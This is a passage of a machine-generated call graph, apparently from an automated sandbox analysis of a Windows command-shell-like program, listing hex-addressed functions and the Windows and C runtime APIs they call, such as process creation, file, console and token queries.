20986->20987 20988 1e470 909 API calls 20986->20988 20987->18654 20988->20987 20990 1e3f0 17 API calls 20989->20990 21002 19f61 20990->21002 20991 1a0e7 ??_V@YAXPAX 20992 1a0ef 20991->20992 20993 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20992->20993 20995 1a0fe 20993->20995 20994 19fd7 20996 1dcd0 451 API calls 20994->20996 21020 19ff4 20994->21020 20995->18629 20995->18641 20996->21020 20997 20060 5 API calls 20997->21002 20999 1a0d9 20999->20991 20999->20992 21000 2c376 _get_osfhandle SetFilePointer 21003 2c392 21000->21003 21000->21020 21001 1a02b _get_osfhandle 21005 1a03d _get_osfhandle 21001->21005 21001->21020 21002->20994 21002->20997 21002->20999 21006 19abf _vsnwprintf 21003->21006 21005->21020 21007 2c3a9 21006->21007 21012 178e4 451 API calls 21007->21012 21008 2c439 21009 19abf _vsnwprintf 21008->21009 21009->21007 21010 1dd98 6 API calls 21010->21020 21011 1a16c _close 21011->21020 21013 2c463 21012->21013 21014 1a125 2 API calls 21013->21014 21014->20999 21015 1a1d6 _dup2 21015->21020 21016 2c3d3 21017 21d90 454 API calls 21016->21017 21021 2c3dd 21017->21021 21018 2c40c 21023 1a1d6 _dup2 21018->21023 21019 20590 19 API calls 21019->21020 21020->20999 21020->21000 21020->21001 21020->21008 21020->21010 21020->21011 21020->21015 21020->21016 21020->21018 21020->21019 21022 2c4aa 21020->21022 21024 1a11c 21020->21024 22081 1a1a8 _dup 21020->22081 22083 39fcf _get_osfhandle GetFileType 21020->22083 21021->21022 21027 2c3f2 SearchPathW 21021->21027 21025 1a125 2 API calls 21022->21025 21026 2c42d 21023->21026 21029 1a125 2 API calls 21024->21029 21028 2c4af 21025->21028 21030 2c434 21026->21030 21031 2c475 21026->21031 21027->21018 21027->21022 21032 39edb 451 API calls 21028->21032 21034 2c47f 21029->21034 21035 1a16c _close 21030->21035 21033 1a16c _close 21031->21033 21032->20999 21033->21024 21036 19abf _vsnwprintf 21034->21036 21035->21008 21037 2c496 21036->21037 21038 178e4 451 API calls 21037->21038 21038->20999 21040 1e470 909 API calls 21039->21040 21041 203a2 21040->21041 21041->18654 21043 1dcd0 451 API calls 21042->21043 21044 20776 21043->21044 21045 2e9b9 21044->21045 21046 20792 21044->21046 21047 2089d 21044->21047 21051 1dd20 451 API calls 21046->21051 21048 1dcd0 451 API calls 21047->21048 21049 208a5 21048->21049 21050 1dcd0 451 API calls 21049->21050 21057 207de 21050->21057 21052 207b3 21051->21052 21053 207bb 21052->21053 21054 2e8bd 21052->21054 21056 1dd20 451 API calls 21053->21056 21055 1dc60 2 API calls 21054->21055 21058 207d6 21055->21058 21056->21058 21057->21045 21059 20812 21057->21059 21060 208c5 21057->21060 21058->21057 21063 1dc60 2 API calls 21058->21063 21061 20875 21059->21061 21062 20818 21059->21062 21064 1bc30 451 API calls 21060->21064 21065 2087f 21061->21065 21066 2e8e7 21061->21066 22084 20bf0 21062->22084 21063->21057 21068 208d2 wcstol 21064->21068 21069 1bc30 451 API calls 21065->21069 21072 20060 5 API calls 21066->21072 22199 1a7d5 21068->22199 21071 2088c 21069->21071 22148 16e57 21071->22148 21076 2e8fd GetFullPathNameW 21072->21076 21073 208ec wcstol 21074 1a7d5 21073->21074 21077 20906 wcstol 21074->21077 21079 2e915 21076->21079 21086 20922 21077->21086 21078 20822 21078->21045 21081 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21078->21081 21080 1dcd0 451 API calls 21079->21080 21082 178e4 451 API calls 21079->21082 21084 2e942 GetFullPathNameW 21079->21084 21088 2e95d 21079->21088 21080->21079 21083 20871 21081->21083 21082->21079 21083->18654 21084->21079 21085 398b5 456 API calls 21085->21086 21086->21066 21086->21085 21087 19abf _vsnwprintf 21086->21087 21093 2198f 3 API calls 21086->21093 22201 20bbb 21086->22201 21087->21086 21089 1bc30 451 API calls 21088->21089 21090 2e99d 21089->21090 22210 33e66 21090->22210 21093->21086 21095 1e5d8 21094->21095 21097 1eda4 21094->21097 21095->18645 21095->18657 21096 1edb7 _wcsicmp 21096->21095 21096->21097 21097->21095 21097->21096 21099 22090 21098->21099 21100 1dcd0 451 API calls 21099->21100 21101 220a9 21100->21101 21102 1b1b0 451 API calls 21101->21102 21127 1e613 21101->21127 21103 220ba 21102->21103 21104 1f410 467 API calls 21103->21104 21103->21127 21105 220d2 21104->21105 21106 220d9 GetConsoleTitleW 21105->21106 21107 2212f 21105->21107 21110 1ad26 453 API calls 21106->21110 21108 22134 GetConsoleTitleW 21107->21108 21109 2217a 21107->21109 21111 1ad26 453 API calls 21108->21111 21112 22183 21109->21112 21113 2f23f 21109->21113 21114 220f2 21110->21114 21117 2214d 21111->21117 21118 2219f 21112->21118 21119 2f24d 21112->21119 21112->21127 21116 18bc7 451 API calls 21113->21116 22264 19458 21114->22264 21116->21127 21121 21a47 907 API calls 21117->21121 21122 178e4 451 API calls 21118->21122 21124 178e4 451 API calls 21119->21124 21120 22107 22326 221b5 21120->22326 21125 22164 21121->21125 21122->21127 21124->21127 22329 221c1 21125->22329 21127->18654 21129 25807 21128->21129 21130 25833 21128->21130 21131 25813 _setjmp3 21129->21131 21130->18652 21131->21130 21132 25825 21131->21132 22430 256c4 21132->22430 21135 1e3f0 17 API calls 21134->21135 21136 17fa0 21135->21136 21137 18001 21136->21137 21138 17fa4 GetDriveTypeW 21136->21138 21139 1800b ??_V@YAXPAX 21137->21139 21140 18013 21137->21140 21141 17fcf 21138->21141 21147 2b033 21138->21147 21139->21140 21143 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21140->21143 21141->21137 21145 17fe0 GetVolumeInformationW 21141->21145 21142 2b05a ??_V@YAXPAX 21142->21140 21144 18022 21143->21144 21144->20888 21144->20909 21145->21137 21146 2b040 GetLastError 21145->21146 21146->21137 21146->21147 21147->21140 21147->21142 21150 22200 21148->21150 21149 22229 21149->20907 21150->21149 21150->21150 21151 22081 909 API calls 21150->21151 21151->21149 21153 1e9b2 21152->21153 21160 1ea65 21152->21160 21154 1e3f0 17 API calls 21153->21154 21161 1e9c3 21154->21161 21155 1eb41 21163 1eb7e iswspace 21155->21163 21164 2dd3f 21155->21164 21166 1a62f wcschr 21155->21166 21167 1eac3 21155->21167 21156 1ea3d 21159 1ebf0 GetFileAttributesW 21156->21159 21156->21160 21157 1e9f6 wcschr 21157->21156 21157->21161 21158 1ea0e wcschr 21158->21161 21159->21160 21162 1ea7e _wcsicmp 21160->21162 21170 1ea99 21160->21170 21161->21155 21161->21156 21161->21157 21161->21158 21161->21160 21162->21160 21163->21155 21163->21167 21173 1dcd0 451 API calls 21164->21173 21165 1eaf7 21168 1eb05 ??_V@YAXPAX 21165->21168 21169 1eb0f 21165->21169 21166->21155 21167->21164 21167->21165 21168->21169 21171 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21169->21171 21170->21164 21170->21167 21172 1ed90 _wcsicmp 21170->21172 21174 1ae12 21171->21174 21172->21155 21175 2dd80 21173->21175 21174->20901 21174->20902 21176 39922 451 API calls 21175->21176 21178 2dd9e 21175->21178 21177 2dd91 longjmp 21176->21177 21177->21178 21180 1b1c9 21179->21180 21181 1dcd0 451 API calls 21180->21181 21182 1af78 21181->21182 21182->20932 21183 1ad26 21182->21183 21184 1ad37 21183->21184 21192 1ad40 21183->21192 21185 1dcd0 451 API calls 21184->21185 21184->21192 21186 2cb7b 21185->21186 21187 2cb85 GetConsoleTitleW 21186->21187 21186->21192 21188 2cb9b 21187->21188 21187->21192 21189 1dd20 451 API calls 21188->21189 21194 2cbcd 21189->21194 21190 2cc33 21191 1dc60 2 API calls 21190->21191 21191->21192 21192->20932 21193 2cc2c SetConsoleTitleW 21193->21190 21194->21190 21194->21193 21194->21194 21279 19cc0 21195->21279 21199 1aa66 21198->21199 21200 2c9eb 21198->21200 21486 1aa75 21199->21486 21202 1aa75 492 API calls 21200->21202 21203 1aa6b 21202->21203 21203->20916 21203->21203 21205 1afdd 21204->21205 21206 1b185 21204->21206 21205->20922 21206->21205 21207 2ccfa SetConsoleTitleW 21206->21207 21207->21205 21209 1c709 21208->21209 21210 1c7ae 21208->21210 21209->21210 21666 1b3c1 21209->21666 21211 21cb1 453 API calls 21210->21211 21214 398b5 456 API calls 21210->21214 21215 178e4 451 API calls 21210->21215 21220 34191 451 API calls 21210->21220 21223 1c8b3 _get_osfhandle SetFilePointer 21210->21223 21226 1c799 21210->21226 21227 1c8da _get_osfhandle GetFileType 21210->21227 21229 1caa2 21210->21229 21230 2d162 memcmp 21210->21230 21240 1c808 MultiByteToWideChar 21210->21240 21241 26c78 4 API calls 21210->21241 21243 1c7b8 SetFilePointer 21210->21243 21244 2d1ce AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21210->21244 21245 1c86f wcschr 21210->21245 21246 1ca03 iswspace 21210->21246 21247 1ca1e wcschr 21210->21247 21248 1caeb wcschr 21210->21248 21249 1ca49 wcschr 21210->21249 21250 2d2b3 _get_osfhandle SetFilePointer 21210->21250 21251 1cb10 iswspace 21210->21251 21252 1cb25 wcschr 21210->21252 21253 2d322 _get_osfhandle SetFilePointer 21210->21253 21254 2d302 WideCharToMultiByte 21210->21254 21255 1cb50 iswspace 21210->21255 21256 1cb80 wcschr 21210->21256 21258 1cbc9 _wcsicmp 21210->21258 21259 1cb65 wcschr 21210->21259 21260 2d3d3 WideCharToMultiByte 21210->21260 21211->21210 21214->21210 21215->21210 21216 1e272 456 API calls 21220->21210 21223->21210 21223->21227 21231 1a16c _close 21226->21231 21227->21210 21228 1c901 SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21227->21228 21228->21210 21232 2d3fc 21229->21232 21235 1cabd _get_osfhandle SetFilePointer 21229->21235 21230->21210 21233 1ca81 21231->21233 21234 21cb1 453 API calls 21232->21234 21236 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21233->21236 21237 2d409 21234->21237 21235->20952 21238 1ca90 21236->21238 21239 178e4 451 API calls 21237->21239 21238->20952 21242 2d427 21239->21242 21240->21210 21241->21210 21243->21210 21244->21210 21245->21210 21246->21210 21246->21247 21247->21210 21248->21210 21248->21250 21249->21210 21250->21210 21250->21251 21251->21210 21251->21252 21252->21210 21253->21210 21254->21253 21255->21210 21255->21259 21257 1cb96 wcschr 21256->21257 21256->21258 21257->21210 21257->21258 21258->21210 21259->21210 21260->21210 21675 19e09 21261->21675 21264 19de1 21266 19df7 21264->21266 21268 19950 451 API calls 21264->21268 21265 2c2b9 21267 163bd 451 API calls 21265->21267 21266->20952 21269 2c2d1 21267->21269 21268->21266 21269->21266 21689 39fcf _get_osfhandle GetFileType 21269->21689 21271 2c2e5 21272 1dd98 6 API calls 21271->21272 21273 2c2e9 21271->21273 21272->21273 21273->21266 21274 178e4 451 API calls 21273->21274 21275 2c316 21274->21275 21275->21275 21690 226dc memset 21276->21690 21280 19cd3 21279->21280 21307 19780 21279->21307 21281 1dcd0 451 API calls 21280->21281 21282 19cdd 21281->21282 21283 1a62f wcschr 21282->21283 21282->21307 21307->20952 21487 2ca49 21486->21487 21490 1aa90 21486->21490 21488 1bc30 451 API calls 21487->21488 21507 2ca70 21487->21507 21580 35166 21487->21580 21488->21487 21490->21487 21491 1aacb _wcsnicmp 21490->21491 21492 1ab3d 21491->21492 21493 1aadf _wcsnicmp 21491->21493 21511 23326 21492->21511 21495 2c9fd 21493->21495 21504 1aaf7 21493->21504 21543 353aa 21495->21543 21498 2cad1 21500 178e4 451 API calls 21498->21500 21499 1ab0f 21499->21498 21502 1ab1b wcschr 21499->21502 21503 2cb08 21500->21503 21501 2ca2d wcsrchr 21501->21499 21504->21498 21504->21499 21504->21501 21507->21498 21510 20060 5 API calls 21507->21510 21510->21498 21512 233ab 21511->21512 21513 2333b 21511->21513 21514 178e4 451 API calls 21512->21514 21513->21512 21515 20060 5 API calls 21513->21515 21516 2f76c 21514->21516 21517 23349 21515->21517 21544 1acb0 451 API calls 21543->21544 21581 3516f 21580->21581 21585 35190 21580->21585 21665 2727b __iob_func 21581->21665 21583 35180 fprintf 21583->21487 21584 351dd 21584->21487 21585->21584 21586 19950 451 API calls 21585->21586 21586->21585 21665->21583 21667 1ab7f 2 API calls 21666->21667 21668 1b3d3 21667->21668 21669 1ab7f 2 API calls 21668->21669 21673 1b3eb 21668->21673 21669->21673 21670 1b3f6 wcschr 21671 1b408 wcschr 21670->21671 21672 1b440 21670->21672 21671->21672 21671->21673 21672->21216 21673->21670 21673->21671 21673->21672 21674 1a62f wcschr 21673->21674 21674->21673 21676 19e14 21675->21676 21687 19dd5 21675->21687 21677 19e8e iswspace 21676->21677 21678 19e19 21677->21678 21679 19e27 iswspace 21678->21679 21680 19e40 21678->21680 21678->21687 21679->21678 21679->21680 21681 19e8e iswspace 21680->21681 21682 19e47 21681->21682 21683 19e62 21682->21683 21684 2c31b _wcsnicmp 21682->21684 21682->21687 21685 19e71 _wcsnicmp 21683->21685 21686 19e67 21683->21686 21684->21686 21684->21687 21685->21686 21685->21687 21686->21687 21688 178e4 451 API calls 21686->21688 21687->21264 21687->21265 21688->21687 21689->21271 21691 1e3f0 17 API calls 21690->21691 21692 227be 21691->21692 21693 228f8 21692->21693 21694 227c8 memset GetEnvironmentVariableW 21692->21694 21695 22912 21693->21695 21696 2290a ??_V@YAXPAX 21693->21696 21697 1e3f0 17 API calls 21694->21697 21698 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21695->21698 21696->21695 21699 22830 21697->21699 21700 22925 21698->21700 21701 228e2 21699->21701 21703 2284a GetEnvironmentVariableW 21699->21703 21700->20916 21701->21693 21702 2f431 ??_V@YAXPAX 21701->21702 21702->21693 21704 2f3b2 21703->21704 21705 22865 21703->21705 21707 19144 451 API calls 21704->21707 21721 19144 21705->21721 21708 2f3cd 21707->21708 21708->21705 21710 178e4 451 API calls 21708->21710 21709 22872 21709->21701 21711 18e9e 451 API calls 21709->21711 21713 2f3e7 21709->21713 21710->21705 21722 1bc30 449 API calls 21721->21722 21723 19172 21722->21723 21724 2b904 21723->21724 21725 1926f 21723->21725 21726 191a6 towupper 21723->21726 21727 2bb35 21723->21727 21729 20060 5 API calls 21723->21729 21733 2bad3 21723->21733 21734 2054b 449 API calls 21723->21734 21737 2669f 449 API calls 21723->21737 21739 2ba93 21723->21739 21741 192c2 21723->21741 21745 3a37a 449 API calls 21723->21745 21724->21709 21724->21724 21728 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21725->21728 21726->21723 21731 1dcd0 449 API calls 21727->21731 21729->21723 21736 163bd 449 API calls 21733->21736 21734->21723 21736->21725 21737->21723 21742 3a53d 449 API calls 21739->21742 21746 178e4 449 API calls 21741->21746 21742->21733 21745->21723 22059 1e7a2 22058->22059 22060 1e7c6 22058->22060 22061 1e7ab wcschr 22059->22061 22064 1e697 22059->22064 22063 1dc60 2 API calls 22060->22063 22060->22064 22062 1e7f4 22061->22062 22061->22064 22065 1dcd0 451 API calls 22062->22065 22063->22064 22064->20958 22064->20964 22071 1e7fe 22065->22071 22066 1e83f 22066->22064 22068 1dc60 2 API calls 22066->22068 22067 1bf70 459 API calls 22067->22071 22068->22064 22069 1dd20 451 API calls 22069->22066 22070 1e8f7 22070->22064 22070->22066 22070->22069 22071->22064 22071->22066 22071->22067 22071->22070 22073 21606 lstrcmpW 22072->22073 22074 21615 lstrcmpiW 22072->22074 22075 2160c 22073->22075 22074->22075 22075->20981 22077 22998 22076->22077 22078 22a09 lstrcmpiW 22077->22078 22079 229ff lstrcmpW 22077->22079 22080 229a0 22077->22080 22078->22080 22079->22080 22080->20981 22082 1a1bd 22081->22082 22082->21020 22083->21020 22085 2054b 451 API calls 22084->22085 22091 20c22 22085->22091 22086 20d9e 22087 1bc30 451 API calls 22086->22087 22142 20e27 22086->22142 22087->22142 22088 210ae 22088->21078 22089 21436 CreateFileW 22092 2ed11 22089->22092 22093 21457 SetFilePointer SetFilePointer 22089->22093 22090 1dd20 451 API calls 22094 20d6a 22090->22094 22091->22086 22095 20c93 _wcsnicmp 22091->22095 22122 1dc60 2 API calls 22091->22122 22133 2054b 451 API calls 22091->22133 22135 2129a wcstol 22091->22135 22136 2118f wcstol 22091->22136 22138 20d4a 22091->22138 22091->22142 22099 178e4 451 API calls 22092->22099 22097 1dcd0 451 API calls 22093->22097 22098 1dd20 451 API calls 22094->22098 22100 20cac _wcsnicmp 22095->22100 22095->22142 22096 398b5 456 API calls 22096->22142 22097->22142 22101 20d81 22098->22101 22102 2ed1e GetLastError 22099->22102 22103 20cc7 _wcsnicmp 22100->22103 22104 2ebf5 22100->22104 22101->22086 22107 2ec27 22101->22107 22102->22088 22108 20ce2 _wcsnicmp 22103->22108 22103->22142 22113 178e4 451 API calls 22104->22113 22105 2ed00 CloseHandle 22105->22088 22106 2148a ReadFile CloseHandle 22106->22142 22109 178e4 451 API calls 22107->22109 22108->22091 22111 21131 _wcsnicmp 22108->22111 22114 2ec33 22109->22114 22110 1dd20 451 API calls 22110->22142 22117 21563 wcstol 22111->22117 22118 2114c _wcsnicmp 22111->22118 22112 212d3 _wpopen 22119 2ece5 22112->22119 22120 212ff feof 22112->22120 22113->22088 22121 39922 451 API calls 22114->22121 22115 2198f 3 API calls 22115->22142 22116 1dc60 GetProcessHeap RtlFreeHeap 22116->22142 22117->22104 22117->22142 22118->22091 22118->22104 22126 178e4 451 API calls 22119->22126 22124 21313 ferror 22120->22124 22125 2136e _pclose 22120->22125 22129 2ec3b longjmp 22121->22129 22122->22091 22123 21546 22130 1dc60 2 API calls 22123->22130 22124->22125 22124->22142 22132 1dd20 451 API calls 22125->22132 22131 2ecf2 GetLastError 22126->22131 22127 2ecb3 _pclose 22127->22088 22128 2134d fgets 22128->22125 22128->22142 22129->22088 22130->22127 22131->22088 22132->22142 22133->22091 22134 213db MultiByteToWideChar 22134->22142 22135->22104 22135->22142 22136->22091 22136->22104 22137 214e7 feof 22137->22124 22137->22142 22138->22086 22138->22090 22139 1dcd0 451 API calls 22139->22142 22140 20fc8 wcschr 22140->22142 22141 2ecc9 22145 178e4 451 API calls 22141->22145 22142->22088 22142->22089 22142->22096 22142->22105 22142->22106 22142->22110 22142->22112 22142->22115 22142->22116 22142->22117 22142->22123 22142->22125 22142->22127 22142->22128 22142->22134 22142->22135 22142->22137 22142->22139 22142->22140 22142->22141 22143 20f0a wcschr 22142->22143 22144 20bbb 488 API calls 22142->22144 22146 213b7 memmove 22142->22146 22147 20f90 wcschr 22142->22147 22143->22142 22144->22142 22145->22088 22146->22142 22147->22142 22149 16f39 22148->22149 22160 16ea7 22148->22160 22150 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 22149->22150 22151 16f4e 22150->22151 22151->21078 22152 2a746 22153 398b5 456 API calls 22152->22153 22191 1701a 22153->22191 22154 1a62f wcschr 22154->22160 22155 16f5d 22156 20060 5 API calls 22155->22156 22157 16f64 22156->22157 22159 1acb0 451 API calls 22157->22159 22158 1dcd0 451 API calls 22158->22191 22161 16f6b 22159->22161 22160->22149 22160->22152 22160->22154 22160->22155 22162 20bbb 488 API calls 22160->22162 22165 2198f 3 API calls 22160->22165 22163 2589a 10 API calls 22161->22163 22162->22160 22164 16fa6 22163->22164 22168 18f21 451 API calls 22164->22168 22164->22191 22165->22160 22166 398b5 456 API calls 22166->22191 22167 25851 2 API calls 22167->22191 22177 16fbf 22168->22177 22169 1dc60 2 API calls 22169->22191 22170 2a7fa 22175 1dc60 2 API calls 22170->22175 22171 2198f 3 API calls 22171->22191 22172 18b4d 2 API calls 22172->22191 22173 2a806 22176 39922 451 API calls 22173->22176 22174 1725d 22180 17271 22174->22180 22181 2a851 22174->22181 22175->22173 22178 2a80b longjmp 22176->22178 22177->22173 22182 1dcd0 451 API calls 22177->22182 22177->22191 22179 2a819 22178->22179 22233 221d2 22179->22233 22183 18bc7 451 API calls 22180->22183 22184 39a7d 451 API calls 22181->22184 22182->22191 22186 1727b GetProcessHeap RtlFreeHeap 22183->22186 22187 2a85c 22184->22187 22190 172ee 8 API calls 22186->22190 22188 1dd20 451 API calls 22188->22191 22189 2a824 22194 21e70 451 API calls 22189->22194 22196 2a835 exit 22189->22196 22193 17294 22190->22193 22191->22158 22191->22166 22191->22167 22191->22169 22191->22170 22191->22171 22191->22172 22191->22173 22191->22174 22191->22188 22192 20bbb 488 API calls 22191->22192 22192->22191 22232 172c6 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 22193->22232 22194->22189 22196->22174 22197 1729c GetProcessHeap RtlFreeHeap 22198 172bc 22197->22198 22198->21078 22200 1a7db 22199->22200 22200->21073 22200->22200 22237 1b45a 22201->22237 22204 3769e 462 API calls 22205 2ebcc 22204->22205 22206 33b4e 451 API calls 22205->22206 22207 2ebd5 22206->22207 22208 19950 451 API calls 22207->22208 22209 20bd6 22208->22209 22209->21086 22214 33ea6 22210->22214 22211 3416f 22212 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 22211->22212 22213 3418b 22212->22213 22213->21078 22214->22211 22215 1dcd0 451 API calls 22214->22215 22220 33ef9 22215->22220 22216 16e57 502 API calls 22217 33f70 22216->22217 22218 1dc60 2 API calls 22217->22218 22219 33f7b 22218->22219 22221 1dcd0 451 API calls 22219->22221 22220->22211 22220->22216 22222 33fa4 22221->22222 22222->22211 22223 33fe2 FindFirstFileW 22222->22223 22224 34164 22223->22224 22230 34006 22223->22230 22226 1dc60 2 API calls 22224->22226 22225 3413c FindNextFileW 22227 34153 FindClose 22225->22227 22225->22230 22226->22211 22227->22224 22229 1dd20 451 API calls 22229->22230 22230->22225 22230->22227 22230->22229 22231 33e66 502 API calls 22230->22231 22231->22230 22232->22197 22234 221df 22233->22234 22235 221d6 22233->22235 22234->22189 22235->22234 22236 2f25c SetConsoleTitleW 22235->22236 22236->22189 22238 1b46c 22237->22238 22240 1b53c 22238->22240 22243 1b4bf 22238->22243 22244 1b5b0 477 API calls 22238->22244 22246 1b484 22238->22246 22248 1b4c8 22238->22248 22250 1b45a 477 API calls 22238->22250 22239 1b45a 477 API calls 22242 1b4d2 22239->22242 22240->22243 22240->22246 22240->22248 22242->22243 22247 1b45a 477 API calls 22242->22247 22243->22204 22243->22209 22244->22238 22246->22243 22255 1b5b0 22246->22255 22251 1b4e4 22247->22251 22248->22239 22248->22243 22249 1b5b0 477 API calls 22252 1b4a5 22249->22252 22250->22238 22251->22243 22254 1b5b0 477 API calls 22251->22254 22252->22243 22253 1b5b0 477 API calls 22252->22253 22253->22252 22254->22251 22256 1b5c8 22255->22256 22257 1b490 22255->22257 22256->22257 22258 1dcd0 451 API calls 22256->22258 22257->22243 22257->22249 22263 1b5eb 22258->22263 22259 1b631 22259->22257 22260 1dd20 451 API calls 22259->22260 22260->22257 22261 201f5 wcsrchr 22261->22263 22262 1ee03 477 API calls 22262->22263 22263->22257 22263->22259 22263->22261 22263->22262 22263->22263 22332 27d90 22264->22332 22266 19467 InitializeProcThreadAttributeList 22267 2bdf1 GetLastError 22266->22267 22268 194b8 UpdateProcThreadAttribute 22266->22268 22344 35c54 22267->22344 22269 194e7 memset memset GetStartupInfoW 22268->22269 22270 2be0d GetLastError 22268->22270 22273 21d90 454 API calls 22269->22273 22274 35c54 451 API calls 22270->22274 22272 2be03 22272->22270 22275 19579 22273->22275 22276 2be1f DeleteProcThreadAttributeList 22274->22276 22278 1acb0 451 API calls 22275->22278 22277 2be5c 22276->22277 22277->21120 22280 19589 22278->22280 22279 2be49 _local_unwind4 22279->22277 22280->22279 22281 201f5 wcsrchr 22280->22281 22282 195c6 22280->22282 22283 195ae 22281->22283 22333 18235 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22282->22333 22283->22282 22284 195b2 lstrcmpW 22283->22284 22284->22282 22286 2be83 22284->22286 22349 350d8 22286->22349 22287 195cb 22289 195d8 22287->22289 22292 19711 CreateProcessAsUserW 22287->22292 22290 195e5 CreateProcessW 22289->22290 22291 2bec4 22289->22291 22293 19608 22290->22293 22295 2bece GetLastError 22291->22295 22292->22293 22294 19612 CloseHandle 22293->22294 22293->22295 22297 1a976 8 API calls 22294->22297 22299 2bee4 22295->22299 22298 1963a 22297->22298 22298->22299 22309 19642 22298->22309 22301 272ef ApiSetQueryApiSetPresence 22299->22301 22305 2bf0a 22299->22305 22300 19671 22301->22305 22302 1dcd0 451 API calls 22306 2bf5b 22302->22306 22305->22302 22305->22309 22306->22279 22306->22309 22309->22300 22358 35f2b 22309->22358 22327 221d2 SetConsoleTitleW 22326->22327 22328 221c0 22327->22328 22328->21127 22330 221d2 SetConsoleTitleW 22329->22330 22331 221cc 22330->22331 22331->21127 22332->22266 22333->22287 22348 35c6a 22344->22348 22345 35d93 22345->22272 22346 178e4 451 API calls 22347 35dfe 22346->22347 22347->22272 22348->22345 22348->22346 22350 21d90 454 API calls 22349->22350 22351 350e8 22350->22351 22352 1dcd0 451 API calls 22351->22352 22353 3511c 22352->22353 22354 1a976 8 API calls 22353->22354 22357 35122 22353->22357 22355 35157 22354->22355 22357->22282 22431 256e2 22430->22431 22432 313ca 22430->22432 22433 256ef 22431->22433 22440 31303 22431->22440 22441 31256 22431->22441 22434 3155c 22432->22434 22437 3126a longjmp 22432->22437 22438 313e2 22432->22438 22463 314e7 22432->22463 22491 25726 22433->22491 22436 25726 452 API calls 22434->22436 22477 312fb 22436->22477 22442 31277 22437->22442 22444 31433 22438->22444 22445 313e7 22438->22445 22439 256fe 22447 25711 22439->22447 22451 25726 452 API calls 22439->22451 22446 25726 452 API calls 22440->22446 22441->22433 22441->22442 22455 31264 22441->22455 22443 25726 452 API calls 22442->22443 22448 31288 22443->22448 22454 257c9 452 API calls 22444->22454 22445->22437 22461 313fc 22445->22461 22449 31316 22446->22449 22503 257c9 22447->22503 22465 312c7 22448->22465 22471 25726 452 API calls 22448->22471 22456 3136e 22449->22456 22460 31326 22449->22460 22478 25726 452 API calls 22449->22478 22450 25726 452 API calls 22450->22434 22451->22447 22453 256c4 452 API calls 22457 31583 22453->22457 22474 3143b 22454->22474 22455->22437 22455->22444 22458 25726 452 API calls 22456->22458 22457->21130 22464 31380 22458->22464 22459 31471 22466 256c4 452 API calls 22459->22466 22460->22456 22469 25726 452 API calls 22460->22469 22462 25726 452 API calls 22461->22462 22468 2571d 22462->22468 22463->22450 22470 25726 452 API calls 22464->22470 22472 256c4 452 API calls 22465->22472 22467 314c2 22466->22467 22473 25726 452 API calls 22467->22473 22468->21130 22469->22456 22475 31390 22470->22475 22471->22465 22476 312d6 22472->22476 22473->22477 22474->22459 22481 3147a 22474->22481 22482 3145c 22474->22482 22479 25726 452 API calls 22475->22479 22480 256c4 452 API calls 22476->22480 22477->22453 22477->22468 22478->22460 22483 3139f 22479->22483 22484 312e3 22480->22484 22485 25726 452 API calls 22481->22485 22482->22459 22487 25726 452 API calls 22482->22487 22486 25726 452 API calls 22483->22486 22484->22468 22489 25726 452 API calls 22484->22489 22485->22459 22488 313b0 22486->22488 22487->22459 22490 25726 452 API calls 22488->22490 22489->22477 22490->22477 22492 2573f 22491->22492 22492->22492 22493 178e4 451 API calls 22492->22493 22498 25781 22492->22498 22494 3159e longjmp 22493->22494 22495 315ae 22494->22495 22496 25726 451 API calls 22495->22496 22497 315c9 22496->22497 22499 25726 451 API calls 22497->22499 22498->22439 22500 315f4 22499->22500 22501 25726 451 API calls 22500->22501 22502 31603 22501->22502 22502->22439 22504 257e4 22503->22504 22504->22468 22505 25726 452 API calls 22504->22505 22506 315c9 22505->22506 22507 25726 452 API calls 22506->22507 22508 315f4 22507->22508 22509 25726 452 API calls 22508->22509 22510 31603 22509->22510 22510->22468 22512 21eb2 22511->22512 22513 2f110 22512->22513 22514 21ebc 22512->22514 22516 21eef 22512->22516 22515 272ef ApiSetQueryApiSetPresence 22513->22515 22514->18684 22517 2f12e 22515->22517 22516->22514 22518 2f15b realloc 22516->22518 22517->18684 22518->22514 22520 26474 22519->22520 22521 26464 NtOpenProcessToken 22519->22521 22522 262fa 22520->22522 22529 26500 NtQueryInformationToken 22520->22529 22521->22520 22522->18696 22522->18697 22525 264a8 22525->22522 22526 264bc NtClose 22525->22526 22526->22522 22528->18715 22530 2648a 22529->22530 22531 26534 22529->22531 22530->22525 22533 264ca NtQueryInformationToken 22530->22533 22531->22530 22532 32018 NtQueryInformationToken 22531->22532 22532->22530 22534 264f3 22533->22534 22534->22525 23028 36910 23029 36921 23028->23029 23030 3692c 23028->23030 23034 35e03 23029->23034 23031 35e03 468 API calls 23030->23031 23033 36926 23031->23033 23057 271a8 23034->23057 23036 35e0f RegOpenKeyExW 23037 35f03 23036->23037 23038 35e45 23036->23038 23037->23033 23039 1bc30 451 API calls 23038->23039 23040 35e57 23039->23040 23041 35e64 23040->23041 23042 20060 5 API calls 23040->23042 23058 35948 23041->23058 23044 35e77 23042->23044 23045 1acb0 451 API calls 23044->23045 23048 35e7e 23045->23048 23048->23041 23051 35e9b 23048->23051 23052 35e6e 23048->23052 23049 35ea0 23050 178e4 451 API calls 23049->23050 23050->23052 23051->23049 23053 1acb0 451 API calls 23051->23053 23127 35f1c 23052->23127 23054 35ec1 23053->23054 23054->23049 23054->23052 23055 35edc 23054->23055 23096 36650 23055->23096 23057->23036 23059 35af8 23058->23059 23076 35970 23058->23076 23060 